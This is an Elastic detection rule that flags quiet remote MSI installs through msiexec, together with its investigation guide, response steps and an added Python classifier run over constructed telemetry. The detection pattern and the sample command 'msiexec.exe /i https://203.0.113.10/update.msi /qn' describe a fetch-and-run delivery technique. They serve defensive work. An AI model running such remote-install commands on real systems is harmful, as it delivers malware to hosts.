Potential Remote Install via MsiExec
Identifies attempts to install a file from a remote server using MsiExec. Adversaries may abuse Windows Installers for initial access and delivery of malware.
Elastic rule
[metadata]
creation_date = "2025/08/19"
integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"]
maturity = "production"
updated_date = "2026/04/30"

[rule]
author = ["Elastic"]
description = """
Identifies attempts to install a file from a remote server using MsiExec. Adversaries may abuse Windows Installers
for initial access and delivery of malware.
"""
from = "now-9m"
index = [
  "endgame-*",
  "logs-crowdstrike.fdr*",
  "logs-endpoint.events.process-*",
  "logs-m365_defender.event-*",
  "logs-sentinel_one_cloud_funnel.*",
  "logs-system.security*",
  "logs-windows.forwarded*",
  "logs-windows.sysmon_operational-*",
  "winlogbeat-*",
]
language = "eql"
license = "Elastic License v2"
name = "Potential Remote Install via MsiExec"
risk_score = 73
rule_id = "c9847fe9-3bed-4e6b-b319-f9956d6dd02a"
severity = "high"
tags = [
  "Domain: Endpoint",
  "OS: Windows",
  "Use Case: Threat Detection",
  "Tactic: Defense Evasion",
  "Data Source: Elastic Endgame",
  "Data Source: Elastic Defend",
  "Data Source: Windows Security Event Logs",
  "Data Source: Microsoft Defender XDR",
  "Data Source: Sysmon",
  "Data Source: SentinelOne",
  "Data Source: Crowdstrike",
  "Resources: Investigation Guide",
]
timestamp_override = "event.ingested"
type = "eql"

query = '''
process where host.os.type == "windows" and event.type == "start" and
  process.name : "msiexec.exe" and process.args : ("-i*", "/i*", "-p*", "/p*") and
  process.command_line : ("*http:*", "*https:*") and
  process.args : ("/qn", "-qn", "-q", "/q", "/quiet") and
  process.parent.name : (
    "sihost.exe", "explorer.exe", "cmd.exe", "wscript.exe", "mshta.exe",
    "powershell.exe", "wmiprvse.exe", "pcalua.exe", "forfiles.exe", "conhost.exe"
  ) and

  not process.command_line : (
    "*--set-server=*", "*UPGRADEADD=*", "*--url=*", "*USESERVERCONFIG=*", "*RCTENTERPRISESERVER=*",
    "*app.ninjarmm.com*", "*zoom.us/client*", "*SUPPORTSERVERSTSURI=*", "*START_URL=*", "*AUTOCONFIG=*",
    "*awscli.amazonaws.com*", "*/i \"C:*", "*/i C:\\*"
  )
'''

note = """## Triage and analysis

### Investigating Potential Remote Install via MsiExec
#### Possible investigation steps

- What remote installer behavior is preserved in the alert?
  - Focus: `process.command_line`, `process.parent.name`, and `process.parent.command_line`, especially quiet install or patch switches, the remote MSI or `TRANSFORMS=` source, and HTTP, raw-IP, public-hosting, or recognized distribution sources.
  - Implication: escalate for quiet remote installs, remote MSTs, or patches from suspicious infrastructure under interactive or script-launcher parents; lower concern only when the command, source, and parent match one recurring deployment, repair, or onboarding pattern.

- Is the msiexec binary identity expected for Windows Installer?
  - Focus: `process.executable`, `process.pe.original_file_name`, `process.code_signature.subject_name`, `process.code_signature.trusted`, and `process.hash.sha256`.
  - Implication: escalate faster when msiexec is renamed, unsigned, untrusted, newly seen, or in a user-writable path; trusted Microsoft identity only confirms the proxy binary, not the remote install.

- Do the parent and ancestry explain why msiexec ran?
  - Focus: `process.parent.executable`, `process.parent.command_line`, `process.Ext.ancestry`, `user.id`, and the affected host.
  - Implication: escalate when browser-adjacent, script, shell, WMI, or unusual interactive ancestry invokes the remote package without a stable workflow; lower concern when the parent, user, and host pattern fits a recognized management or support path.

- Do process events show payload execution after the installer starts?
  - Focus: child starts on the same `host.id` where `process.parent.entity_id` matches `process.entity_id`, checking child `process.command_line`, `process.executable`, and `process.hash.sha256`. $investigate_0
  - Hint: use `host.id` + `process.pid` + tight alert window only when entity linkage is unavailable, and treat the result as weaker.
  - Implication: escalate when msiexec spawns shells, script interpreters, LOLBins, scheduled-task tools, or user-space binaries tied to the remote package; lower concern when follow-on activity stays inside the same signed product install flow.

- Do the remote source and workflow context fit one legitimate package path?
  - Focus: URL, host, package name, or remote `TRANSFORMS=` in `process.command_line`, plus `process.parent.executable`, `user.id`, and `host.id` context for that source.
  - Hint: if network or file telemetry exists, correlate destination or artifact evidence with `host.id` + `process.entity_id`; use `host.id` + `process.pid` + tight alert window only without entity linkage. Missing file or network telemetry is unresolved, not benign, and does not block escalation when process evidence is strong. $investigate_1
  - Implication: escalate when the source is raw IPs, public file hosting, look-alike vendors, temp/download staging, or infrastructure unrelated to the expected product; lower concern when source, launcher, user-host scope, and recovered corroboration fit one internal distribution point or vendor service.

- Escalate on suspicious quiet-install intent, mismatched identity or lineage, unfit package source, or payload child execution; close only when process evidence and recovered corroboration align to one exact deployment, repair, or support workflow; preserve and escalate when evidence is mixed or visibility is incomplete. Use same-user or same-host related alerts after escalation only to size scope, not to prove the local alert. $investigate_2 $investigate_3

### False positive analysis

- First check whether `http:` or `https:` follows `/i` or `/p` directly (remote source -- investigate) or sits inside a `PROPERTY=` value while the MSI source is local or relative (configuration URL -- likely benign). The rule excludes local `C:\\` sources after `/i`; UNC, relative-path, or other local sources with property URLs need manual confirmation or customer-side exceptions.
- Legitimate deployment, patching, or agent-repair workflows can use quiet remote msiexec. Confirm when `process.command_line`, `process.parent.executable`, `user.id`, and `host.id` align to one recurring product path. Do not close on a vendor-looking URL, signed msiexec, or familiar parent name alone.
- Build exceptions from `process.parent.executable`, the package source pattern in `process.command_line`, and a stable `host.id` or `user.id` cohort. Avoid exceptions on msiexec, `process.parent.name`, domain suffix, or `user.name` alone.

### Response and remediation

- If confirmed benign, reverse any temporary containment and record the installer command, remote package source, parent launcher, signer/hash identity, affected `user.id`, affected `host.id`, and any recovered destination or artifact pattern. Create an exception only after the same workflow recurs across prior alerts from this rule.
- If suspicious but unconfirmed, preserve the alert record, process tree, `process.entity_id` values, installer command line, remote URL or `TRANSFORMS=` value, parent command line, child process records, and any recovered package, destination, or provenance artifacts before containment. Apply reversible controls only when command, parent, or child-process evidence suggests active delivery; otherwise keep evidence collection open rather than starting cleanup.
- If confirmed malicious, preserve process identifiers, command lines, recovered packages, and destination indicators before isolating the host, terminating msiexec or follow-on payloads, blocking confirmed indicators, or removing staged installers, extracted payloads, persistence changes, or scheduled-task material tied to the chain.
- Post-incident hardening: close the delivery path that introduced the remote package, restrict msiexec remote-install use to controlled deployment tooling where feasible, review hosts where installer-elevation policy would increase impact, and document adjacent variants such as remote `TRANSFORMS=` abuse or DLL registration through `/y` and `/z`.
"""

setup = """## Setup

This rule is designed for data generated by [Elastic Defend](https://www.elastic.co/security/endpoint-security), which provides native endpoint detection and response, along with event enrichments designed to work with our detection rules.

Setup instructions: https://ela.st/install-elastic-defend

### Additional data sources

This rule also supports the following third-party data sources. For setup instructions, refer to the links below:

- [CrowdStrike](https://ela.st/crowdstrike-integration)
- [Microsoft Defender XDR](https://ela.st/m365-defender)
- [SentinelOne Cloud Funnel](https://ela.st/sentinel-one-cloud-funnel)
- [Sysmon Event ID 1 - Process Creation](https://ela.st/sysmon-event-1-setup)
- [Windows Process Creation Logs](https://ela.st/audit-process-creation)
"""

[rule.investigation_fields]
field_names = [
  "@timestamp",
  "host.id",
  "user.id",
  "process.entity_id",
  "process.pid",
  "process.executable",
  "process.command_line",
  "process.args",
  "process.hash.sha256",
  "process.parent.entity_id",
  "process.parent.executable",
  "process.parent.command_line",
  "process.pe.original_file_name",
  "process.code_signature.subject_name",
  "process.code_signature.trusted",
]

[transform]

[[transform.investigate]]
label = "Child process activity from msiexec"
description = ""
providers = [
  [
    { excluded = false, field = "host.id", queryType = "phrase", value = "{{host.id}}", valueType = "string" },
    { excluded = false, field = "process.parent.entity_id", queryType = "phrase", value = "{{process.entity_id}}", valueType = "string" },
    { excluded = false, field = "event.category", queryType = "phrase", value = "process", valueType = "string" },
    { excluded = false, field = "event.type", queryType = "phrase", value = "start", valueType = "string" }
  ]
]
relativeFrom = "now-1h"
relativeTo = "now"

[[transform.investigate]]
label = "File or network activity by msiexec"
description = ""
providers = [
  [
    { excluded = false, field = "host.id", queryType = "phrase", value = "{{host.id}}", valueType = "string" },
    { excluded = false, field = "process.entity_id", queryType = "phrase", value = "{{process.entity_id}}", valueType = "string" },
    { excluded = false, field = "event.category", queryType = "phrase", value = "file", valueType = "string" }
  ],
  [
    { excluded = false, field = "host.id", queryType = "phrase", value = "{{host.id}}", valueType = "string" },
    { excluded = false, field = "process.entity_id", queryType = "phrase", value = "{{process.entity_id}}", valueType = "string" },
    { excluded = false, field = "event.category", queryType = "phrase", value = "network", valueType = "string" }
  ]
]
relativeFrom = "now-1h"
relativeTo = "now"

[[transform.investigate]]
label = "Alerts associated with the user"
description = ""
providers = [
  [
    { excluded = false, field = "event.kind", queryType = "phrase", value = "signal", valueType = "string" },
    { excluded = false, field = "user.id", queryType = "phrase", value = "{{user.id}}", valueType = "string" }
  ]
]
relativeFrom = "now-48h/h"
relativeTo = "now"

[[transform.investigate]]
label = "Alerts associated with the host"
description = ""
providers = [
  [
    { excluded = false, field = "event.kind", queryType = "phrase", value = "signal", valueType = "string" },
    { excluded = false, field = "host.id", queryType = "phrase", value = "{{host.id}}", valueType = "string" }
  ]
]
relativeFrom = "now-48h/h"
relativeTo = "now"

[[rule.threat]]
framework = "MITRE ATT&CK"
[[rule.threat.technique]]
id = "T1218"
name = "System Binary Proxy Execution"
reference = "https://attack.mitre.org/techniques/T1218/"
[[rule.threat.technique.subtechnique]]
id = "T1218.007"
name = "Msiexec"
reference = "https://attack.mitre.org/techniques/T1218/007/"

[rule.threat.tactic]
id = "TA0005"
name = "Defense Evasion"
reference = "https://attack.mitre.org/tactics/TA0005/"

[[rule.threat]]
framework = "MITRE ATT&CK"

[[rule.threat.technique]]
id = "T1105"
name = "Ingress Tool Transfer"
reference = "https://attack.mitre.org/techniques/T1105/"

[rule.threat.tactic]
id = "TA0011"
name = "Command and Control"
reference = "https://attack.mitre.org/tactics/TA0011/"
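The two checks the investigation guide leans on most, the false-positive test (does the URL follow `/i` or `/p` as the package source, or only sit inside a `PROPERTY=` value while the source is local or relative?) and the child-process linkage used by the "Child process activity from msiexec" investigate query (same `host.id`, `process.parent.entity_id` equal to the alert's `process.entity_id`, with `host.id` + `process.pid` + a tight window as the weaker fallback), are worked through below as an added Python example. It is not part of the Elastic rule and not Elastic code. All telemetry is constructed: the flattened ECS-style field names mirror the rule's investigation fields, `203.0.113.10` is a documentation-range address, `example.test` is a reserved test domain, and `CONFIGURL` and `SERVERURL` are made-up property names chosen so they do not collide with the rule's own `START_URL=` and `AUTOCONFIG=` exclusions.

```python
import re
from datetime import datetime, timedelta

# Switch families taken from the rule's EQL: install/patch triggers and quiet flags.
INSTALL_PATCH = ("/i", "-i", "/p", "-p")
QUIET = {"/qn", "-qn", "/q", "-q", "/quiet"}
URL = re.compile(r"^https?:", re.IGNORECASE)


def tokenize(cmdline):
    """Split a Windows command line on whitespace, keeping double-quoted runs together."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def classify_msiexec(cmdline):
    """Apply the rule's switch logic plus the false-positive note's /i-vs-PROPERTY test.

    Verdicts: 'remote-install' (URL is the package source right after /i or /p: investigate),
    'property-url-only' (local/relative source, URLs only inside PROPERTY=: likely benign),
    'out-of-scope' (no install/patch switch, no quiet flag, or no URL anywhere).
    """
    tokens = tokenize(cmdline)
    switch = source = None
    quiet = False
    property_urls = []
    i = 0
    while i < len(tokens):
        tok, low = tokens[i], tokens[i].lower()
        if low in QUIET:
            quiet = True
        elif (switch is None and low[:2] in INSTALL_PATCH
              # exact switch, or source glued on (/i"C:\x.msi", /ihttps://...); skips /passive
              and (len(tok) == 2 or tok[2] == '"' or URL.match(tok[2:]))):
            switch = low[:2]
            if len(tok) > 2:
                source = tok[2:].strip('"')
            elif i + 1 < len(tokens):
                i += 1
                source = tokens[i]
        elif "=" in tok and not tok.startswith(("/", "-")):
            prop, _, value = tok.partition("=")
            if URL.match(value.strip('"')):
                property_urls.append(prop.upper())
        i += 1
    source_remote = bool(source and URL.match(source))
    if switch is None or not quiet or not (source_remote or property_urls):
        verdict = "out-of-scope"
    elif source_remote:
        verdict = "remote-install"
    else:
        verdict = "property-url-only"
    return {"switch": switch, "source": source, "source_is_remote": source_remote,
            "quiet": quiet, "property_urls": property_urls, "verdict": verdict}


def child_processes(alert, events, window=timedelta(minutes=10)):
    """Find follow-on process starts spawned by the alerting msiexec.

    Preferred linkage (what the rule's child-process investigate query does): same host.id
    and process.parent.entity_id == the alert's process.entity_id. Fallback, labelled weaker:
    same host.id, process.parent.pid == alert process.pid, inside a tight time window.
    Returns (matching events, linkage label).
    """
    def same_host_start(e):
        return (e["host.id"] == alert["host.id"]
                and e["event.category"] == "process" and e["event.type"] == "start")

    entity = alert.get("process.entity_id")
    linked = [e for e in events if same_host_start(e) and entity
              and e.get("process.parent.entity_id") == entity]
    if linked:
        return linked, "entity"
    weak = [e for e in events if same_host_start(e)
            and e.get("process.parent.pid") == alert["process.pid"]
            and abs(e["@timestamp"] - alert["@timestamp"]) <= window]
    return weak, "pid (weaker)"


# Constructed sample telemetry (flattened ECS field names); not real events.
T0 = datetime(2025, 8, 19, 12, 0, 0)
ALERT = {"@timestamp": T0, "host.id": "host-a", "process.pid": 4120, "process.entity_id": "msi-1",
         "process.command_line": "msiexec.exe /i https://203.0.113.10/update.msi /qn"}
EVENTS = [
    {"@timestamp": T0 + timedelta(seconds=5), "host.id": "host-a", "event.category": "process",
     "event.type": "start", "process.parent.entity_id": "msi-1", "process.parent.pid": 4120,
     "process.command_line": 'cmd.exe /c "C:\\Users\\Public\\stage.bat"'},
    {"@timestamp": T0 + timedelta(seconds=9), "host.id": "host-b", "event.category": "process",
     "event.type": "start", "process.parent.entity_id": "msi-1", "process.parent.pid": 4120,
     "process.command_line": "notepad.exe"},            # other host: never linked
    {"@timestamp": T0 + timedelta(hours=2), "host.id": "host-a", "event.category": "process",
     "event.type": "start", "process.parent.pid": 4120,  # pid reuse far outside the window
     "process.command_line": "calc.exe"},
]

if __name__ == "__main__":
    for cmd in (ALERT["process.command_line"],
                'msiexec.exe /qn /i "C:\\Temp\\agent.msi" CONFIGURL=https://example.test/cfg',
                "msiexec.exe /qn /i agent.msi SERVERURL=https://example.test/agent.json"):
        print(classify_msiexec(cmd)["verdict"], "<-", cmd)
    kids, how = child_processes(ALERT, EVENTS)
    print(how, [k["process.command_line"] for k in kids])
```

The third sample command (relative `agent.msi` with a property URL) is the case the false-positive note singles out: the rule's `/i "C:` and `/i C:\` exclusions do not cover it, so it still fires and needs the manual `/i`-versus-`PROPERTY=` check or a customer-side exception built on the parent executable, source pattern and host or user cohort. The `pid (weaker)` path only exists for telemetry without entity ids; the window keeps later pid reuse out, but the result should be treated as the guide says, as weaker corroboration rather than proof.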
Related rules
- Command Obfuscation via Unicode Modifier Letters
- Attempt to Install or Run Kali Linux via WSL
- Script Execution via Microsoft HTML Application
- Bypass UAC via Event Viewer
- UAC Bypass Attempt via Windows Directory Masquerading